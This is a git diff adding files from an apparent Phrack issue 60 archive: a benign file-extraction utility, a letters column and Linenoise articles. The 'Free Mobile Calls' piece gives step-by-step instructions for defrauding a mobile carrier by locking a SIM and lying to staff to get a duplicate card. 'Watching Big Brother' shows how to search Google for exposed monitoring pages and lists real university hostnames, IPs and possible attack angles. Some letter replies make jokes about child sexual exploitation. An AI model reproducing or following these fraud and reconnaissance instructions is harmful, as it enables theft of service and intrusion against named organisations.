+def die(msg, errcode = 1):
+    print msg
+    sys.exit(errcode)
+
+if __name__ == '__main__':
+    try: main()
+    except KeyboardInterrupt: pass              # No messy traceback.
+<-->
+<++> extract/extract-win.c !e519375d
+/***************************************************************************/
+/* WinExtract                                                              */
+/*                                                                         */
+/* Written by Fotonik <fotonik@game-master.com>.                           */
+/*                                                                         */
+/* Coding of WinExtract started on 22aug98.                                */
+/*                                                                         */
+/* This version (1.0) was last modified on 22aug98.                        */
+/*                                                                         */
+/* This is a Win32 program to extract text files from a specially tagged   */
+/* flat file into a hierarchical directory structure.  Use to extract      */
+/* source code from articles in Phrack Magazine.  The latest version of    */
+/* this program (both source and executable codes) can be found on my      */
+/* website:  http://www.altern.com/fotonik                                 */
+/***************************************************************************/
+
+
+#include <stdio.h>
+#include <string.h>
+#include <windows.h>
+
+
+void PowerCreateDirectory(char *DirectoryName);
+
+
+int WINAPI WinMain(HINSTANCE hThisInst, HINSTANCE hPrevInst,
+                   LPSTR lpszArgs, int nWinMode)
+{
+OPENFILENAME OpenFile; /* Structure for Open common dialog box */
+char InFileName[256]="";
+char OutFileName[256];
+char Title[]="WinExtract - Choose a file to extract files from.";
+FILE *InFile;
+FILE *OutFile;
+char Line[256];
+char DirName[256];
+int FileExtracted=0;   /* Flag used to determine if at least one file was */
+int i;                 /* extracted */
+
+ZeroMemory(&OpenFile, sizeof(OPENFILENAME));
+OpenFile.lStructSize=sizeof(OPENFILENAME);
+OpenFile.hwndOwner=HWND_DESKTOP;
+OpenFile.hInstance=hThisInst;
+OpenFile.lpstrFile=InFileName;
+OpenFile.nMaxFile=sizeof(InFileName)-1;
+OpenFile.lpstrTitle=Title;
+OpenFile.Flags=OFN_FILEMUSTEXIST | OFN_HIDEREADONLY;
+
+if(GetOpenFileName(&OpenFile))
+   {
+   if((InFile=fopen(InFileName,"r"))==NULL)
+      {
+      MessageBox(NULL,"Could not open file.",NULL,MB_OK);
+      return 0;
+      }
+
+   /* If we got here, InFile is opened. */
+   while(fgets(Line,256,InFile))
+      {
+      if(!strncmp(Line,"<++> ",5)) /* If line begins with "<++> " */
+         {
+         Line[strlen(Line)-1]='\0';
+         strcpy(OutFileName,Line+5);
+
+         /* Check if a dir has to be created and create one if necessary */
+         for(i=strlen(OutFileName)-1;i>=0;i--)
+            {
+            if((OutFileName[i]=='\\')||(OutFileName[i]=='/'))
+               {
+               strncpy(DirName,OutFileName,i);
+               DirName[i]='\0';
+               PowerCreateDirectory(DirName);
+               break;
+               }
+            }
+
+         if((OutFile=fopen(OutFileName,"w"))==NULL)
+            {
+            MessageBox(NULL,"Could not create file.",NULL,MB_OK);
+            fclose(InFile);
+            return 0;
+            }
+
+         /* If we got here, OutFile can be written to */
+         while(fgets(Line,256,InFile))
+            {
+            if(strncmp(Line,"<-->",4)) /* If line doesn't begin w/ "<-->" */
+               {
+               fputs(Line, OutFile);
+               }
+            else
+               {
+               break;
+               }
+            }
+         fclose(OutFile);
+         FileExtracted=1;
+         }
+      }
+   fclose(InFile);
+   if(FileExtracted)
+      {
+      MessageBox(NULL,"Extraction sucessful.","WinExtract",MB_OK);
+      }
+   else
+      {
+      MessageBox(NULL,"Nothing to extract.","Warning",MB_OK);
+      }
+   }
+   return 1;
+}
+
+
+/* PowerCreateDirectory is a function that creates directories that are */
+/* down more than one yet unexisting directory levels.  (e.g. c:\1\2\3) */
+void PowerCreateDirectory(char *DirectoryName)
+{
+int i;
+int DirNameLength=strlen(DirectoryName);
+char DirToBeCreated[256];
+
+for(i=1;i<DirNameLength;i++) /* i starts at 1, because we never need to */
+   {                         /* create '/' */
+   if((DirectoryName[i]=='\\')||(DirectoryName[i]=='/')||
+      (i==DirNameLength-1))
+      {
+      strncpy(DirToBeCreated,DirectoryName,i+1);
+      DirToBeCreated[i+1]='\0';
+      CreateDirectory(DirToBeCreated,NULL);
+      }
+   }
+}
+<-->
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack60/2.txt b/phrack60/2.txt
new file mode 100644
index 0000000..bb4d552
--- /dev/null
+++ b/phrack60/2.txt
@@ -0,0 +1,308 @@
+phrack.org:~# cat /dev/random
+
+                           ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3c, Phile #0x02 of 0x10
+
+|=----------------------=[ L O O P B A C K ]=----------------------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------------=[ phrackstaff ]=------------------------------=|
+
+
+----| QUOTE of the month
+
+    [ Once upon a time in #phrack ]
+
+<OUAH:#phrack> *** PHRACK #60 SCHEDULED FOR 2002-12-27 ***
+<chmod_:#phrack> i know
+<chmod_:#phrack> its already 2 hours late
+<phrack_webmaster_undercover:#phrack> is it already the 27th?
+<chmod_:#phrack> yes
+<chmod_:#phrack> in some parts of the world
+<bajkero:#phrack> Fri Dec 27 02:01:13 CET 2002
+
+    [ Meanwhile: phrack_webmaster_undercover doing the
+      s/27th/28th/g thingie on index.php ]
+
+<phrack_webmaster_undercover:#phrack> hmm. strange, it reads 28th here.
+<chmod_:#phrack> they changed recently
+<chmod_:#phrack> it was 27th just one hour ago
+<phrack_webmaster_undercover:#phrack> mysterious...
+
+----| Statistics of the month
+
+root@phrack.org:/var/log > grep '\.mil' httpd_access.log | uniq | wc -l
+    248
+root@phrack.org:/var/log > grep '\.gov' httpd_access.log | uniq | wc -l
+    937
+
+|=[ 0x01 ]=--------------------------------------------------------------=|
+
+Editor in Chief!!!!
+
+[ Nope, sorry I'm just the phrackstaff's slave answering the emails. ]
+
+I have been trying to get the phrack magazine but upto date I have not
+succeeded.. I come from an African country called "kenya" and it seems they
+dont bring them there!!!!!! Please send me the subscription and the
+magazines if it posssible and bill me later,.....
+
+[ Kenya, 1.00North, 38.00East, 582,650sq, higest point you can read
+  phrack: Mount Kenya 5,199m, lowest point: Indian Ocen (0m hehe.).
+  Potential number of phrack readers: 31,138,735. Hacker growth rate: 1.15%,
+  hackers life expactancy at birth: 47.02 years, Literacy: age 15 and over
+  can read phrack. 78.1% of the total population can read phrack.
+  http://www.cia.giv/cia/publications/factbook/geos/ke.html ]
+  
+My address is fredie@kikuyu.com
+
+Yours truly
+
+Fredie..
+
+[ Phrack is free. Nice to know that phrack read in all parts of the world,
+  we definitely want to hear from you more often ]
+
+|=[ 0x02 ]=--------------------------------------------------------------=|
+
+From: Omar Tarabay <omar_tarabay@yahoo.com>
+Subject: a real newbie
+
+Hey guys,
+
+    [ Hello dude ]
+
+I read your last edition and it was just great, i visited the site daily
+to see if the new edition is down or not.
+
+    [ oh, so that's you in the weblogs? Hi :> ]
+    
+I realy liked the files on your last edition (lockpicking was the greatest)
+i won't ask questions that you expect me to ask like 'please tell me how to
+hack into hotmail or the pentagon'.
+
+    [ Oh man, you missed it, I had some 0day for you ]
+
+put i read myself and learn things myself but as a newbie i don't find
+most of your articles understandable,its only for experts and pros so
+if you can write articles for newbies like me and many others who want to
+learn please do, and about myself i amTURBOWEST(i am sure that u can know
+my real name easily but please don't say it)
+
+    [ Your real name is: TURBOEAST! ]
+
+I am 12 y/o
+
+   [ Nothing to be ashamed of. We will be at the same age in 13 years. ]
+
+I program in python . I am trying to install linux on my PC but i face
+some problems which i am trying to solve(i read a lot of books about
+linux)
+
+    [ You read these linux books? What did they teach you? How to format
+      your harddrive, install a webcam and masturbate with 13 years old 
+      girls on netmeetings? ]
+
+finaly i would like to say thanks for all the phrack staff and ask them to
+reply to me.
+
+TURBOWEST
+
+   [ Nothing. Hope you wont get any problems with the pedophile child
+     molesters who get back to you now... ]
+
+|=[ 0x03 ]=--------------------------------------------------------------=|
+
+From: George escobar <dierwolf2@yahoo.com>
+Subject: thanks
+
+i found your site informative. thanks  
+        dierwolf2
+
+    [ at your service! We dont take money donation, however you can send
+      female shaped human beings. ]
+
+|=[ 0x04 ]=--------------------------------------------------------------=|
+
+From: "Anthony Webb" <a_gentle_man@hotmail.com>
+Subject: OK..I'm stupid, but help me anyway
+
+OK, I admit it...I love the website, but I can't find my way around in it.
+Yeah, I know, I'm dumber than a bag of rusty hammers.  But I need help.
+
+    [ It is a good start to admit it, let's look at your case ]
+
+I am looking for a simple program to keep track of my companies phone calls
+without the company knowing I'm doing it.
+
+    [ Oh man ... that's not good at all ... ]
+
+No, I am NOT paranoid, they ARE out to get me.
+
+    [ Honestly, you are not! Be prepared for the worst! Watch Jackie Chan
+      and Akira movies on a daily base to train your ninja-style to be
+      prepared to whatever there might come. Huh? Did you hear that?
+      THEY ARE ALREADY AT YOUR DOOR. RUUUUUUUUUUUUUUUUUUN! ]
+
+I don't have $1100 to $2500 to spend on Call Accounting Software and I
+don't need all those bells and whistles anyway. I just need to keep track
+of who the people are talking to, what time, what extension, whether its
+outbound or inbound, etc. The company has an Avaya (Lucent) Merlin Magix
+PBX system. By tracking who they call I can establish that they are indeed
+guilty of harrassment against my paranoid little butt.
+
+Got any ideas? gentle....but pissed at the organization.
+
+    [ Are you sure that noone of your coworkers watched this email? ]
+
+|=[ 0x05 ]=--------------------------------------------------------------=|
+
+From: domino@hush.com
+
+can I please get those zines in zip format, they are interesting, but I use
+windows. If not, can you complete the articles? I was reading one, and it
+was in txt and it said 9 of 10. there was no link to the 10th article. this
+happened many times with different ones. Yeah anyways, I would be nice to
+have those as zip files for those who don't have linux as would many others,
+or at least fix the links. (not much of a problem just missing a page)
+Great magazine, I just wish that I could complete it. thanx.
+
+[ (man winzip) || (man google) || (man brain) || (man life) || (man gun) ]
+
+|=[ 0x06 ]=--------------------------------------------------------------=|
+
+From: "melissa royer" <melissa.royer@verizon.net>
+
+Hello
+
+I am having some trouble compiling the code extracted from your site. I
+have the code on linux RH 7.3 Is this the problem??
+
+[root@lenny Loki]# make linux
+
+make[1]: *** [surplus.o] Error 1
+make[1]: Leaving directory `/loki/loki2/Loki'
+make: *** [linux] Error 2
+
+[ I swear this dood^H^H^H^H Melissa really tried to compile that 7 years old
+  source from p49. Unless we turn into a red-hat-gcc-problems-support-center
+  will we not give any hints. Rumours about any fusion on the latter topic
+  can not be confirmed or denied at this point. ]
+
+|=[ 0x07 ]=--------------------------------------------------------------=|
+
+[ someone with a 'new' and 'unbreakable' crytpo idea of his own ]
+
+[ blah blah ] ...didn't know Applied Cryptography, thanks for the link.
+[ blah blah ] ...one time pad are maybe not very usefull but they are for
+hackers ...[ blah blah ]. When a friend of mine rooted NASA i used one-time
+pads to tell my other friends [ blah blah blah ].
+
+[ So what's your general recommendation then? That we should banish
+  blowfish and use one-time-pad's because they are..err..better when
+  we want to tell our...err..friends that we ..err..hacked NASA? hu? ]
+
+|=[ 0x08 ]=--------------------------------------------------------------=|
+
+From: "Bowman, Michael" <Michael.Bowman@ed.gov>
+
+SUBSCRIBE Phrack
+
+    [ Dear Government Of Education, you failed to subscribe where your
+      our schoolars already succeeded. Please ask your classmate if you
+      have any further problems. We are awaiting your second trial until
+      next monday or we are urget to inform the director about your lack
+      of success. ]
+
+|=[ 0x09 ]=--------------------------------------------------------------=|
+
+[ from web comments to phrack 3-9, 2002-11-07
+FromL laipie@ms14.url.com.tw
+
+Hello
+I want to download some material from your website.
+
+    [ Our links are protected by some kind of intelligent checker. You
+      have to press ALT-Q while clicking on the link (quickly!). ]
+
+|=[ 0x0a ]=--------------------------------------------------------------=|
+
+From: "Dustin Smith" <dustinsmith01@hotmail.com>
+Subject: The unfortunate life...
+
+Well you may know me as the "script kiddy" but lately i ma having 
+illusions of Grandure and am aspiring to be...I dont dare say it
+cuz I am stillso far off but yet so close.  So a subsription to your Holy 
+grail will be just peaches...In all humbleness of the greatness
+that is possed by few I bid you adue...
+
+    [ THIS IS NOT MADE UP! We really get these kind of emails! ]
+
+
+_________________________________________________________________
+Broadband? Dial-up? Get reliable MSN Internet Access. 
+
+    [ Get a brain first! ]
+
+|=[ 0x0b ]=--------------------------------------------------------------=|
+
+From: "Princess Of Darkness" <broken_flowers@hotmail.com>
+Subject: symantec
+
+
+uhh... hello.
+
+::waves::
+
+My name's Rosie. hi.  I really actually know very little to nothing about 
+hacking..  and it'd like to know more.  I know links, websites, etc. etc.  
+
+    [ That's a beginning!
+      Lesson2: "How do I read the website".
+      Lesson3: "How do I understand the website"
+      Lesson4: "How do I utilize the website"
+      Lesson5: "How do I hire for a lawyer"
+      Lesson6: "How do I escape the feds" ]
+
+but when you can't even write html it makes things a little difficult.  God 
+I feel so retarded. don't laugh. I'm a lam0r, i know.
+
+    [ The real reason why phrack comes as .txt is because noone knows
+      this < > -thingie either. ]
+
+anyway, thanks a lot for like.. reading this...
+
+    [ thanks a lot for like.. writing this... ]
+
+and uh..  don't find out where i live..  cos that's.. scary..  O.o;;
+
+adios
+~0513~
+
+|=[ 0x0c ]=--------------------------------------------------------------=|
+
+From: anthony charles <bemoeasy@yahoo.com>
+Subject: EAGER STUDENT
+
+Dear editor,
+
+i was directed by somebody i met online that i should
+contact your mag about being a hacker.I'm resident in
+Nigeria,West Africa. i would be very grateful if you
+can assist me because it has been my dream to be a
+hacker.
+
+The users in the hackers lounge in yahoo chat are too
+fast for me. i need to learn the rudiments of becoming
+a hacker.Every start's somewhere...this is where i
+start if you would honor me by imparting knwledge to
+an eager student.
+
+Awaiting your reply.
+yours sincerely
+Anthony Charles
+
+    [ no comment ]
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack60/3.txt b/phrack60/3.txt
new file mode 100644
index 0000000..968983b
--- /dev/null
+++ b/phrack60/3.txt
@@ -0,0 +1,785 @@
+                            ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3c, Phile #0x03 of 0x10
+
+|=-----------------------=[ L I N E N O I S E ]=-------------------------=|
+|=-----------------------------------------------------------------------=|
+|=-------------------------=[ Phrack Staff ]=----------------------------=|
+
+
+--[ Contents
+
+  1 - The Dark Side of NTFS
+  2 - Watching Big Brother
+  3 - Free mobile calls
+  4 - Lawfully Authorized Electronic Surveillance [LAES]
+  5 - Java Tears down the Firewall
+
+--[ 1 - The Dark Side of NTFS
+
+Ok, this didnt fit anywhere else so we put it here:
+
+http://patriot.net/~carvdawg/docs/dark_side.html
+
+--[ 2 - Watching Big Brother
+
+        by da_knight <x667576616a6e@yahoo.com>
+
+
+    Have you ever wanted to be the one doing the watching? If you are a
+system administrator of UNIX / Linux servers, then you may be aware of a
+product called Big Brother, which can be downloaded from 'http://bb4.com/'.
+This article is by no means technical, simply because it doesn't need to
+be. It is divided into two sections, so bear with me for the briefing on
+Big Brother (BB).
+
+    BB is a program that will monitor various computer equipment; things it
+can monitor are connectivity, cpu utilization, disk usage, ftp status, http
+status, pop3 status, etc. As you might imagine, this information is very
+important to an organization. BB is your standard client / server setup.
+The server software can run on various flavors of UNIX, Linux and NT. The
+client software is available for UNIX, Linux, NT, Mac, Novell, AS/400, and
+VAXEN; some client software is provided by 3rd-party vendors and not
+supported by BB4 Technologies.
+
+    The cool thing about this is all of this information is viewed on a web
+page. So, if you have multiple servers that you have to maintain, with this
+product you would be able to go to one web page and quickly get a status of
+all of those servers - pretty handy. When everything is fine your status is
+"green", major problems are indicated by "red".
+
+    Example: The connectivity (conn) status is done by pinging the
+equipment in question; if the ping fails then it would appear as a red zit
+on the web page. When tests such as this fail, BB can be configured to
+automatically page the administrator.
+
+Here is a quick run down of the statuses, listed in order of severity:
+
+red    - Trouble; you've got problems.
+purple - No report; the client hasn't responded in the last 30 minutes.
+yellow - Attention; a threshold has been crossed.
+green  - OK; take the day off.
+clear  - Unavailable; the test has been turned off.
+blue   - Disabled; notification for this test has been turned off.
+
+    The status is also reflected in the title of the web page, so it only
+takes one red zit to cause the web page title to start with "red:Big
+Brother"; we're going to get into this in a minute.
+
+    A common thing for administrators to do is to monitor their most
+important systems with this product, as well as the most important aspects
+of each system. If you have a web server, you would want to monitor the
+http and conn statuses just to make sure people are still able to connect
+to the server. Other tests I have seen are to check Oracle, or to list all
+connected users. Hell, they even have a way to add weather reports. The
+point is, it's pretty limitless what can be monitored, it just depends on
+what you deem important.
+
+    Now that you have a little bit of an understanding what BB can do, I
+want to quote two things from BB4 Technologies (BB4) FAQ - Section 5:
+Security Considerations (http://bb4.com/bb/help/bb-faq.html#5.0).
+Everything in that section of the FAQ should be considered, but we'll focus
+on these two.
+
+    "BB does not need to run as root. We suggest creating a user 'bb' and
+running bb as that user." "We recommend password-protecting the Big Brother
+web pages"
+
+    So, you ask yourself, why are these things important to me? Well, one,
+you know that administrators who run this software probably have it setup
+using the user 'bb', and that they may also be running it with root level
+access. This gives you a valid user account on a system and this account
+probably wouldn't be used by a human very often so the password could be
+something simple. But that's not the point of this article. The second
+thing is that BB4 realizes the information on these web pages is extremely
+important and they recommend password-protecting them.
+
+    Following this logic you then say these are web pages, so it's running
+on a web server and if they're not password-protected and the server is
+visible to the WWW, then...that's right search engines will find these
+pages and serve them up when you know what to look for.
+
+    What are you waiting for? Go to 'http://www.google.com' and search for
+"green:Big Brother" (include the quotes; it makes it more refined). You
+will get about 16,200 matches. Now that doesn't mean that those are all
+unique because it will have numerous pages from the same site, but you get
+the point. I would estimate that there are over 200 sites that can be
+viewed this way. Remember to search for all the other statuses too, just
+change the name of the color. One more thing, I chose Google for a reason.
+Some of these sites no longer run the BB product, but Google has a nice
+ability to view cached pages, so you can still glean information from them.
+
+    After you scroll through the list of sites you will realize that the
+majority of them are either small ISP's or colleges. I'm going to pick on a
+college, an Ivy League one, no less. I can tell you from looking at this
+particular BB site that the BB server is running on a computer called
+'artemis.cs.yale.edu' and the IP address is '128.36.232.57'. Also the
+computer 'rhino.zoo.cs.yale.edu' is having some serious issues. How did I
+find the IP address? Simple; if you click on the "green" or whatever color
+button under the "conn" column, you will see a web page that has
+information similar to this:
+
+---------------------------------------------------------
+
+rhino.zoo.cs.yale.edu - conn
+
+---------------------------------------------------------
+ 
+green Sun Jun 30 01:33:15 EDT 2002 Connection OK  PING 128.36.232.12
+(128.36.232.12) from 128.36.232.57 : 56(84) bytes of data. 64 bytes
+from 128.36.232.12: icmp_seq=0 ttl=255 time=379 usec
+
+--- 128.36.232.12 ping statistics ---
+1 packets transmitted, 1 packets received, 0% packet loss round-trip
+min/avg/max/mdev = 0.379/0.379/0.379/0.000 ms
+
+---------------------------------------------------------
+
+    Right there you know that the ping command was trying to ping
+'128.36.232.12', in this case, 'rhino.zoo.cs.yale.edu' and that it came
+from '128.36.232.57' or 'artemis.cs.yale.edu'. Let's see what else we can
+find out.
+
+    I can see that almost all of their servers run Tripwire, so they are
+UNIX systems, and you probably would have a hard time creating a backdoor
+account on these systems. On another page, we get to see the users who are
+currently logged in. Currently we have 33 users logged in, and seeing as
+it's 1:33 AM, I think some people left their computers logged in.
+
+    I want to get more information about Yale's servers, so let's go back
+to Google and look for another page from Yale, but this time look for
+'zelda.cs.yale.edu'. Now we can get some good information. When this site
+is displayed you will see quite a few servers, listed as well as several
+departments. If you want to know what software 'plucky.cs.yale.edu' is
+using to run it's HTTP services just click on the 'green' button:
+
+----------------------------------------------------
+
+plucky.cs.yale.edu - http
+
+----------------------------------------------------
+ 
+green Sun Jun 30 01:45:21 EDT 2002 
+
+
+ http://plucky.cs.yale.edu - Server OK
+HTTP/1.1 200 OK
+Server: Microsoft-IIS/4.0
+Content-Location: http://plucky.cs.yale.edu/index.html Date: Sun, 30
+Jun 2002 05:45:21 GMT
+Content-Type: text/html
+Accept-Ranges: bytes
+Last-Modified: Tue, 12 Jan 1999 20:49:40 GMT ETag:
+"54b4ec126d3ebe1:4051"
+Content-Length: 2226
+
+
+Seconds: 0.01 
+
+----------------------------------------------------
+
+    What the hell? They're actually running IIS 4.0? Don't they know how
+insecure that is? But I digress. From that information you know that the
+server is some version of Windows NT and it has IIS 4.0 running, that could
+be handy.
+
+    Zelda is also showing they monitor printers. Now that can be fun; what
+if the message "I think therefore I hack!" is sent to the printer
+'philo-printer.philosophy.yale.edu'? And in case you're wondering, the
+printer is an 'HP LaserJet 4050 Series'; I just had to click on the button
+under the "printer" column to find that out.
+
+    Elsewhere on this same site, I find that several servers are running
+TELNET, POP3, Oracle, FTP, and IMAP. Most of these services will gladly
+tell you what version of the software they are running. Oracle, for
+instance, is even nice enough to show you all of the connected users. How
+can you thank them enough for this valuable information?
+
+    Also, it seems only the geologists at Yale feel they have data that is
+of great importance. I wasn't able to view what they monitor because of
+access permissions on their web site, but I do know that they are running
+their web server on Apache version 1.3.26.
+
+    As you can see, I would be able to gather an enormous amount of vital
+infrastructure data in a few minutes. Plus, I didn't break any laws. These
+web pages are posted in a manner that the entire world can view them. It
+might take someone 10 minutes or more to find out a few facts about 1
+particular system, but in that amount of time I found numerous facts about
+over 40 systems at the same organization. Thanks Big Brother!
+
+    I feel it should be mentioned that the information found on these web
+pages is information that most organizations don't even let employees
+outside of the IT department see. I guess I should feel special since Yale
+must feel that I'm not a security risk, otherwise they would have made me
+authenticate to their web sites.
+
+    Imagine this; an ISP that lists all of their routers complete with IP's
+and model information. If you had that, you could possibly rely on
+vulnerabilities in SNMP discovered earlier this year, or better yet, rely
+on the default accounts / passwords setup on these types of devices. I only
+bring this up because I know I did come across an ISP that did list routers
+and the majority of the sites returned by Google seemed to be smaller ISPs.
+
+    Also, about searching on Google, I would recommend searching for
+"red:Big Brother", because these pages will always give you more
+information than when the system is running perfectly.
+
+    Finally, I didn't write this article to condone breaking into systems
+and providing a means to that end. I wrote this because security is
+extremely important; with the information that is found because of this one
+product your environment could be compromised. If you are a system
+administrator for a site that shows up on Google you may want to secure
+your BB web pages, because by the time you read this the world is going to
+know your infrastructure.
+
+--[ 3 - Free Mobile Calls
+
+        by eurinomo
+
+This bug can be utilized to make FREE CALS, FREE SMS, and even FREE 
+WAP.
+
+    1st you have to see if you mobile network has the bug. Just call the
+service free number (to don't waste money) and say to them that you card
+is locked that you forgot your fone in your litle syster's room and your
+mobile says "Sim Card is lock" or something, say that maybe yor sister have
+wronged the puk because the phone was powered off and now it's on. Then the
+guy must say that you have to go to one of theyr Mobile Shops and say the
+problem and they will give you another card with the same number and money
+as the old. Ask them how much it will cost and the guy must say it's for
+free! :-)
+
+Now the Matirial that youl need:
+- A mobile phone not nokia (it's better to be yours and not unlocked)
+- And a nokia(can be a unlocked 1 or steled or borrowed. Do as you wish!)
+
+How to do it:
+
+Mobile1 = Not nokia
+Mobile2 = Nokia
+
+Put the card in the mobile1 and enter your pin. When it booted up put this
+code 3 times:
+**04*00000000*00000000*00000000#
+or try
+**05*00000000*00000000*00000000#
+
+    Check the manual and search for the code to change the puk if the above
+examples dont work. Or give a email to motorola and say that you have a
+motorola phone and that you want to change the puk and you know that is a
+code to change (the code isn't ilegal and it's also specified in the 
+manual).
+
+    If the code isnt the one that i have telled is 1 nerby. If you have a 
+motorola flare when you put **04* or **05* it'ill say "Enter the old Puk"
+or something like that automatly and then ask the new puk code 2 times. But
+the important is to lock your card, i think you can do it also if you wrong
+the pin 3 times and then enter a wrong puk and vuala it's locked! But what i
+was saing about the code it's was tested but you can try this last too, use
+it in your on risk.
+
+    Now goto the Mobile Shop and say what hapened (that your litle sister
+or a doughter of an friend of your mother or something like that...) And
+then they will dupicate the card and they will give you the new one and the
+old one. At last they normaly give the 2.
+
+    Now the easy part. Put the old card in the nokia and boot it up and you
+see thats not locked!!! and if you put on anoher phone not nokia its says
+that its locked, the Bug is a more nokia Bug that a network Bug. Now send a
+SMS with the old card and see if disconted money. Then see if was disconted
+from the new card if not than it's because the Network has the bug and you
+can waste the money off the old card as you wish but you only have 2 weeks
+or soo before they cut it out of the Network and it's completly lock, but
+the new card stil have the same money and you can do it again and again
+that i think they woldn't catch you.
+
+This was tested in the Portugal Vodafone Mobile Phone Network.
+
+
+--[ 4 - Introduction to Lawfully Authorized Electronic Surveillance (LAES)
+
+           by Mystic <mystic@lostways.net>
+
+In 1994 Congress adopted the Communications Assistance for Law Enforcement
+Act (CALEA). It's intent was to preserve but not expand the wiretapping
+capabilities of law enforcement agencies by requiring telecommunication
+providers to utilize systems that would allow government agencies a basic
+level of access for the purpose of surveillance. The act however does not
+only preserve the already existing capabilities of law enforcement to tap
+communications, it enhances them, allowing the government to collect
+information about wireless callers, tap wireless content, text messing, and
+packet communications. The standard that resulted from this legislation is
+called Lawfully Authorized Electronic Surveillance or LAES.
+
+
+A Telecommunications Service Provider (TSP) that is CALEA compliant
+provides means to access the fallowing services and information to Law
+Enforcement Agencies (LEAs):
+
+1. Non-call associated: Information about the intercept subjects that is
+   not necessarily related to a call.
+
+2. Call associated: call-identifying information about calls involving the
+   intercept subjects.
+
+3. Call associated and Non-call associated signaling information: Signaling
+   information initiated by the subject or the network
+
+4. Content surveillance: the ability to monitor the subjects'
+   communications. 
+
+This process is called the intercept function. The intercept function is
+made up of 5 separate functions: access, delivery, collection, service
+provider administration, and law enforcement administration.    
+
+
+----[ 4.1  The Access Function (AF)
+
+
+    The AF consists of one or more Intercept Access Points (IAPs) that
+isolate the subject's communications or call-identifying information
+unobtrusively. There are several different IAPs that can be utilized in
+the intercept function. I have separated them into Call Associated and
+Non-call Associated information IAPs and Content Surveillance IAPs:
+
+Call Associated and Non-call Associated information IAPs
+--------------------------------------------------------
+
+- Serving System IAP (SSIAP): gives non-call associated information.
+
+- Call-Identifying Information IAP (IDIAP): gives call associated
+  information and in the form of the fallowing call events for basic
+  circuit calls:
+
+  Answer      - A party has answered a call attempt
+  Change      - The identity or identities of a call has changed
+  Origination - The system has routed a call dialed by the subject or the
+                system has translated a number for the subject
+  Redirection - A call has been redirected (e.g., forwarded,
+                diverted, or deflected)
+  Release     - The facilities for the entire call have
+	        been released TerminationAttempt - A call attempt to an
+	        intercept subject has been detected
+
+- Intercept Subject Signaling IAP (ISSIAP): provides access to
+  subject-initiated dialing and signaling information. This includes if the
+  intercept subject uses call forwarding, call waiting, call hold, or
+  three-way calling. It also gives the LEA the ability to receive the
+  digits dialed by the subject.
+
+- Network Signaling IAP (NSIAP): Allows the LEA to be informed about
+  network messages that are sent to the intercept subject. These messages
+  include busy, reorder, ringing, alerting, message waiting tone or visual
+  indication, call waiting, calling or redirection name/number information,
+  and displayed text.
+
+Content Surveillance IAPs
+-------------------------
+
+   The fallowing are content surveillance IAPs that transmit content using
+a CCC or CDC. An interesting note about content surveillance is that
+TSPs are not responsible for decrypting information that is encrypted by
+the intercept subject unless the data was encrypted by the TSP and the
+TSP has the means to decrypt it. 
+
+- Circuit IAP (CIAP): accesses call content of circuit-mode communications. 
+
+- Conference Circuit IAP (CCIAP): Provides access to the content of
+  subject-initiated Conference Call services such as three-way calling and
+  multi-way calling.
+
+- Packet Data IAP (PDIAP): Provides access to data packets sent or received
+  by the intercept subject.
+  
+ These include the fallowing services:
+
+ ISDN user-to-user signaling
+ ISND D-channel X.25 packet services
+ Short Message Services (SMS) for cellular and Personal Communication Services
+ Wireless packet-mode data services (e.g., Cellular Digital Packet Data
+        (CDPD), CDMA,  TDMA, PCS1900, or GSM-based packet-mode data  services)
+ X.25 services
+ TCP/IP services
+ Paging (one-way or two-way)
+ Packet-mode data services using traffic channels
+
+----[ 4.2  The Delivery Function (DF)
+
+   The DF is responsible for delivering intercepted communications to one
+or more Collection Functions. This is done over two distinct types of
+channels: Call Content Channels (CCCs) and Call Data Channels (CDCs).
+The CCCs are generally used to transport call content such as voice or
+data communications. CCCs are either "combined" meaning that they carry
+transmit and receive paths on the same channel, or "separated" meaning
+that transmit and receive paths are carried on separate channels. The
+CDCs are generally used to transport messages which report
+which is text based such as Short Message Service (SMS). Information
+over CDCs is transmitted using a protocol called the Lawfully Authorized
+Electronic Surveillance Protocol (LAESP).
+
+----[ 4.3  The Collection Function (CF)
+
+   The CF is responsible for collecting and analyzing intercepted
+communications and call-identifying information and is the
+responsibility of the LEA.
+
+----[ 4.4  The Service Provider Administration Function (SPAF)
+
+   The SPAF is responsible for controlling the TSP's Access and Delivery Functions.
+
+----[ 4.5  The Law Enforcement Administration Function (LEAF)
+
+   The LEAF is responsible for controlling the LEA's Collection Function
+and is the responsibility of the LEA.
+
+   Now that I've introduced you to LAES lets look at an implementation of
+it that is on the market right now and is being used by some TSPs:
+
+Overview of the CALEAserver:
+
+   The CALEAserver is manufactured by SS8 Networks. It is a collection and
+delivery system for call information and content. It allows existing
+networks to become completely CALEA compliant. It allows for a LEA to
+monitor wireless and wire line communications and gather information about
+the calls remotely. The CALEAserver interfaces with the network through
+Signaling System 7 (SS7) which is an extension of the Public Switched
+Telephone Network (PSTN). The CALEAserver is composed of three major
+layers: the Hardware Platform Layer, the Network Platform Layer and the
+Application Software Layer.
+
+    The Hardware Platform Layer consists of the Switching Matrix and the
+Computing Platform. The Switching Matrix is an industry standard
+programmable switch. It contains T1 cards for voice transmission and cross
+connect between switches, DSP cards for the conference circuits required
+for the intercept and DTMF reception/generation, and CPU cards for
+management of the switch. The Computing Platform is a simplex, rack
+mounted, UNIX based machine. It is used to run the CALEAserver application
+software that provides Delivery Function capabilities and controls the
+Switching Matrix.
+
+   The Network Platform Layer provides SS7 capability, as well as, call
+processing APIs for the Application Software Layer. It also controls the
+Switching Matrix.
+
+   The Application Software Layer is where the Delivery and Service Provider
+Administration functions are carried out. It isolates the interfaces
+towards the Access and Collection Functions from the main delivery
+functionality allowing for multiple Access and Collection Functions through
+the Interface Modules that can be added or modified without impacting the
+existing functionality.
+
+System Capacity:
+
+Configurable for up to: 
+
+1000 Collection functions 
+128 Access Function Interfaces 
+32 SS7 links 
+512 simultaneous call content intercepts on a single call basis 
+64 T1 voice facilities 
+
+Operating Environment: 
+
+NEBS compliant, -48 volt, 19" rack mounted equipment 
+Next-generation UltraSPARC processor 
+66-MHz PCIbus 
+Solaris UNIX operating system 
+9Gbyte, 40-MB/sec SCSI disks 
+512 Mbytes RAM standard 
+Ethernet/Fast Ethernet, 10-BaseT and 100-BaseT 
